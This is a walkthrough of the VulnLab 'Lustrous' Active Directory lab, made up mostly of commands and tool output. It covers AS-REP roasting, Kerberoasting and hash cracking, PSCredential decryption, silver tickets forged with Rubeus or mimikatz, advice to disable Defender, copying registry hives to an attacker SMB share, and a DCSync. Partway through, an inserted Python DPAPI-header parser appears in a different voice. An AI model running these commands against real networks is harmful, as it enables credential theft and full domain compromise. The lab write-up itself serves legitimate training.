VulnLab Lustrous

Lustrous

Recon

└─$ rustscan -g -a 10.10.190.69,10.10.190.70 -r 1-65535
10.10.190.69 -> [21,53,80,88,135,139,389,443,445,464,593,636,3269,3268,3389,5985,9389]
10.10.190.70 -> [135,139,445,3389,5985]

└─$ nmap -sC -sV -p21,53,80,88,135,139,389,443,445,464,593,636,3269,3268,3389,5985,9389 10.10.190.69          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 23:43 +05
Nmap scan report for 10.10.190.69
Host is up (0.090s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_12-26-21  11:50AM       <DIR>          transfer
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-14 18:42:03Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Subject Alternative Name: DNS:LusDC.lustrous.vl
| Not valid before: 2021-12-26T09:46:02
|_Not valid after:  2022-12-26T00:00:00
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Not valid before: 2025-01-13T18:30:47
|_Not valid after:  2025-07-15T18:30:47
|_ssl-date: 2025-01-14T18:42:50+00:00; -1m20s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSDC
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusDC.lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-14T18:42:11+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: LUSDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s
| smb2-time: 
|   date: 2025-01-14T18:42:11
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.28 seconds

└─$ nmap -sC -sV -p135,139,445,3389,5985 10.10.190.70

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 23:35 +05
Nmap scan report for 10.10.190.70
Host is up (0.089s latency).

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-01-14T18:35:12+00:00; -1m20s from scanner time.
| ssl-cert: Subject: commonName=LusMS.lustrous.vl
| Not valid before: 2025-01-13T18:30:47
|_Not valid after:  2025-07-15T18:30:47
| rdp-ntlm-info: 
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSMS
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusMS.lustrous.vl
|   DNS_Tree_Name: lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-14T18:34:32+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-01-14T18:34:34
|_  start_date: N/A
|_clock-skew: mean: -1m20s, deviation: 0s, median: -1m20s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.34 seconds

LusMS.lustrous.vl

The HTTPS port is open, but it returns 401. We also have an FTP service that allows anonymous login, and there we find user directories. We can try stealing a hash through it, but that doesn’t work.

└─$ ftp anonymous@10.10.190.69 
Connected to 10.10.190.69.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50101|)
125 Data connection already open; Transfer starting.
12-26-21  11:50AM       <DIR>          transfer
226 Transfer complete.
ftp> cd transfer
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50102|)
125 Data connection already open; Transfer starting.
12-26-21  11:51AM       <DIR>          ben.cox
12-26-21  11:49AM       <DIR>          rachel.parker
12-26-21  11:49AM       <DIR>          tony.ward
12-26-21  11:50AM       <DIR>          wayne.taylor
226 Transfer complete.
ftp> 

So let’s create a user list and check whether any of these users is vulnerable to AS-REP Roasting.

└─$ GetNPUsers.py -usersfile usernames.txt -outputfile asrep.hash -request -format hashcat -dc-ip 10.10.190.69 lustrous.vl/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

$krb5asrep$23$ben.cox@LUSTROUS.VL:a14ef6711f8206102adece1f066e7297$cf54c1df0a2a3f5034a422d43d675e2828857da3f6163b23bd5d019d14208f152dcf1aca65cf322d1dc76d7da3be309ef112d1185280f1b73947291cbe4c3f7ced3967c35037433ada2ef2bedc432683fa726b67193f7e310cd797337064ddd7e52fd44baf8d40bc3e6131e498aa5e1dd8c6b58256e116d02a4e0b9c654b641e6240d2995c074da096ce69c8881264ecaaf45882453f7a416a726805ba4e0f976e4e943baec72fed4b4f767a57251ae4b8293d570f4d2f3883bc8ca1560f35b0d65862f20b452f40cc9aff7ae9b8ebdc8442c33793bdaf7a7f31406e81dd1027a539afcbac97f53119ad
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set

Crack it

└─$ hashcat -m 18200 -a 0 asrep.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
<SNIP>
$krb5asrep$23$ben.cox@LUSTROUS.VL:a14ef6711f8206102adece1f066e7297$cf54c1df0a2a3f5034a422d43d675e2828857da3f6163b23bd5d019d14208f152dcf1aca65cf322d1dc76d7da3be309ef112d1185280f1b73947291cbe4c3f7ced3967c35037433ada2ef2bedc432683fa726b67193f7e310cd797337064ddd7e52fd44baf8d40bc3e6131e498aa5e1dd8c6b58256e116d02a4e0b9c654b641e6240d2995c074da096ce69c8881264ecaaf45882453f7a416a726805ba4e0f976e4e943baec72fed4b4f767a57251ae4b8293d570f4d2f3883bc8ca1560f35b0d65862f20b452f40cc9aff7ae9b8ebdc8442c33793bdaf7a7f31406e81dd1027a539afcbac97f53119ad:<REDACTED>
<SNIP>

└─$ nxc smb 10.10.190.69 -u 'ben.cox' -p '<REDACTED>'                                              
SMB         10.10.190.69    445    LUSDC            [*] Windows Server 2022 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
SMB         10.10.190.69    445    LUSDC            [+] lustrous.vl\ben.cox:<REDACTED> 

Let’s also check for Kerberoastable users.

└─$ GetUserSPNs.py lustrous.vl/ben.cox:'<REDACTED>' -dc-ip 10.10.190.69 -request -outputfile kerb.hash
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName     Name     MemberOf  PasswordLastSet             LastLogon                   Delegation 
-----------------------  -------  --------  --------------------------  --------------------------  ----------
http/lusdc               svc_web            2021-12-22 18:46:12.670282  2025-01-14 23:42:12.263803             
http/lusdc.lustrous.vl   svc_web            2021-12-22 18:46:12.670282  2025-01-14 23:42:12.263803             
MSSQL/lusdc              svc_db             2021-12-22 18:46:34.170590  <never>                                
MSSQL/lusdc.lustrous.vl  svc_db             2021-12-22 18:46:34.170590  <never>                                



[-] CCache file is not found. Skipping...

Crack

└─$ hashcat -m 13100 -a 0 kerb.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
<SNIP>
$krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$db1590764321cd59bbbf1fcf1632f806$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:<REDACTED>
<SNIP>

Let’s collect domain information with BloodHound.

└─$ bloodhound-python -d 'lustrous.vl' -u 'ben.cox' -p '<REDACTED>' -c all -ns 10.10.190.69 --zip

ben.cox can PSRemote, so we can connect to LUSMS.

└─$ evil-winrm -i 10.10.190.70 -u 'ben.cox' -p '<REDACTED>'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ben.cox\Documents>

We find admin.xml

*Evil-WinRM* PS C:\Users\ben.cox> ls desktop


    Directory: C:\Users\ben.cox\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        12/26/2021  10:30 AM           1652 admin.xml

*Evil-WinRM* PS C:\Users\ben.cox> cat desktop\admin.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">LUSMS\Administrator</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
    </Props>
  </Obj>
</Objs>

We can decrypt it by following these references:

  • https://stackoverflow.com/questions/63639876/powershell-password-decrypt
  • https://systemweakness.com/powershell-credentials-for-pentesters-securestring-pscredentials-787263abf9d8
  • https://exploit-notes.hdks.org/exploit/cryptography/algorithm/powershell-credentials/

*Evil-WinRM* PS C:\Users\ben.cox> $EncString = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367"
*Evil-WinRM* PS C:\Users\ben.cox> $SecureString = ConvertTo-SecureString $EncString
*Evil-WinRM* PS C:\Users\ben.cox> $Credential = New-Object System.Management.Automation.PSCredential -ArgumentList "LUSMS\Administrator",$SecureString
*Evil-WinRM* PS C:\Users\ben.cox> $password = echo $Credential.GetNetworkCredential().password
*Evil-WinRM* PS C:\Users\ben.cox> $password
<REDACTED>
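Before decrypting, it is worth understanding what the `<SS>` element actually holds. The following Python is an added example, not code from the post or from any tool it uses: it parses the Export-Clixml output above (embedded inline as sample input) and reads the unencrypted header of the DPAPI blob inside it. The header exposes the provider GUID, the GUID of the master key the blob was protected with, the cipher and hash algorithm ids and the scope flag. That is why the ConvertTo-SecureString call above only works in the same user context on LUSMS (ben.cox’s DPAPI master key is what unlocks it), and why an exported PSCredential file is only as safe as the profile that created it. The algorithm-id names in CALG_NAMES and the CRYPTPROTECT_LOCAL_MACHINE flag value are assumptions drawn from the CryptoAPI constants, not from the post.

```python
import struct
import uuid
import xml.etree.ElementTree as ET

# Sample input constructed from the admin.xml shown in the post (an Export-Clixml
# PSCredential). The <SS> element is a hex-encoded DPAPI blob, not a password.
CLIXML = r"""<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">LUSMS\Administrator</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
    </Props>
  </Obj>
</Objs>"""

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"

# Assumed mapping of CryptoAPI ALG_ID values to names (not taken from the post).
CALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
              0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}
CRYPTPROTECT_LOCAL_MACHINE = 0x4  # assumed CryptProtectData flag value


def parse_clixml_credential(xml_text):
    """Return (username, hex_blob) from an Export-Clixml PSCredential document."""
    username = hex_blob = None
    for el in ET.fromstring(xml_text).iter():
        if el.tag == PS_NS + "S" and el.get("N") == "UserName":
            username = el.text
        elif el.tag == PS_NS + "SS" and el.get("N") == "Password":
            hex_blob = el.text.strip()
    return username, hex_blob


def parse_dpapi_blob(blob):
    """Walk the plaintext header of a CryptProtectData blob; nothing is decrypted."""
    pos = 0

    def u32():
        nonlocal pos
        (value,) = struct.unpack_from("<I", blob, pos)
        pos += 4
        return value

    def take(n):
        nonlocal pos
        chunk = bytes(blob[pos:pos + n])
        pos += n
        return chunk

    info = {}
    info["version"] = u32()
    info["provider_guid"] = str(uuid.UUID(bytes_le=take(16)))   # constant DPAPI GUID
    info["mk_version"] = u32()
    info["masterkey_guid"] = str(uuid.UUID(bytes_le=take(16)))  # which master key unlocks it
    info["flags"] = u32()
    info["description"] = take(u32()).decode("utf-16-le").rstrip("\x00")
    info["alg_crypt"] = u32()
    info["alg_crypt_bits"] = u32()
    info["salt"] = take(u32())
    info["hmac_key"] = take(u32())
    info["alg_hash"] = u32()
    info["alg_hash_bits"] = u32()
    info["hmac"] = take(u32())
    info["data"] = take(u32())        # the actual ciphertext of the SecureString
    info["signature"] = take(u32())
    if pos != len(blob):
        raise ValueError("trailing bytes: not a well-formed DPAPI blob")
    return info


def describe_credential(xml_text):
    """Summarise what a defender can learn from the file without any key material."""
    username, hex_blob = parse_clixml_credential(xml_text)
    info = parse_dpapi_blob(bytes.fromhex(hex_blob))
    scope = "machine" if info["flags"] & CRYPTPROTECT_LOCAL_MACHINE else "user"
    return {
        "username": username,
        "scope": scope,
        "masterkey_guid": info["masterkey_guid"],
        "cipher": CALG_NAMES.get(info["alg_crypt"], hex(info["alg_crypt"])),
        "hash": CALG_NAMES.get(info["alg_hash"], hex(info["alg_hash"])),
        "ciphertext_len": len(info["data"]),
    }


if __name__ == "__main__":
    for key, value in describe_credential(CLIXML).items():
        print(f"{key}: {value}")
```

Run it as a script to get the summary for the embedded file, or point parse_clixml_credential at any other Export-Clixml output. A user-scoped blob with the same master key GUID turning up in several files is a useful hunting signal: all of them were created under the same profile.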

We can connect as Administrator using these credentials.

└─$ evil-winrm -i 10.10.190.70 -u administrator -p '<REDACTED>'   
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

LusDC.lustrous.vl

Nothing interesting inside. Remember that we got a 401 error when visiting the HTTPS service running on lusdc.lustrous.vl; when we access it from LusMS instead, we receive a login prompt.

We can use ben.cox’s credentials. It seems to store user notes.

During the roasting attacks we saw the svc_web user with the SPN http/lusdc.lustrous.vl, which probably runs this web server. We were able to crack its hash, so now we can try a Silver Ticket attack. To perform this attack we need:

  • NTLM hash of the service account
  • Domain SID
  • SPN of the service: http/lusdc.lustrous.vl

Convert the password to its NTLM hash

└─$ iconv -f ASCII -t UTF-16LE <(printf "<REDACTED>") | openssl dgst -md4
MD4(stdin)= <REDACTED>

We can retrieve the domain SID using lookupsid.py, PowerView’s Get-DomainSID cmdlet, or BloodHound.

└─$ lookupsid.py lustrous/ben.cox:'<REDACTED>'@10.10.252.165

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 10.10.252.165
[*] StringBinding ncacn_np:10.10.252.165[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2355092754-1584501958-1513963426

<SNIP>

Then we can generate the ticket and pass it into the current session using Rubeus or mimikatz. Note that the host has Windows Defender enabled, so it has to be disabled, given an exclusion path, or worked around some other way.

The final command for Rubeus:

Rubeus.exe silver /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl  /service:http/lusdc.lustrous.vl /rc4:<REDACTED> /user:<USERNAME> /id:<RID> /ptt /nowrap

Or mimikatz:

privilege::debug
kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /target:lusdc.lustrous.vl /service:http /rc4:<REDACTED> /user:<USERNAME>

It works

Now let’s access it via PowerShell using the URL http://lusdc.lustrous.vl/Internal, which contained all the notes.

Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content

Nothing useful. tony.ward is a member of the Backup Operators group, so we can check his notes.

It seems they contain credentials.

Now we can use RegSave or Impacket’s reg.py. Let’s use Impacket.

└─$ smbserver.py -smb2support "dump" "./"     
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed

Retrieve secrets

└─$ reg.py lustrous/tony.ward:'<REDACTED>'@lusdc.lustrous.vl backup -o '\\10.8.4.147\dump'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saved HKLM\SAM to \\10.8.4.147\dump\SAM.save
[*] Saved HKLM\SAM to \\10.8.4.147\dump\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.8.4.147\dump\SECURITY.save

But it can fail due to a timeout, so we can also use the BackupOperators tool by who4m1.

└─$ x86_64-w64-mingw32-g++ ./BackupOperators.cpp -o BackupOperators

Upload it to the host and run it.

PS C:\windows\tasks> .\BackupOperators.exe
Dumping SAM hive to C:\windows\temp\sam.hive
Dumping SYSTEM hive to C:\windows\temp\system.hive
Dumping SECURITY hive to C:\windows\temp\security.hive

Download the hives from the DC; they were saved to C:\Windows\Temp.

└─$ smbclient.py lustrous/tony.ward:'<REDACTED>'@lusdc.lustrous.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

# use C$
# get windows\temp\sam.hive
# get windows\temp\system.hive
# get windows\temp\security.hive
# exit

└─$ secretsdump.py -system SYSTEM.save -sam SAM.save -security SECURITY.save local 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:<REDACTED>
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM 
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up... 

Now DCSync using the DC machine account’s hash.

└─$ secretsdump.py 'lusdc$'@lusdc.lustrous.vl -hashes :<REDACTED>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>

https://api.vulnlab.com/api/v1/share?id=fbb5ab2b-c29a-4d80-8649-861447fa8d9f

This post is licensed under CC BY 4.0 by the author.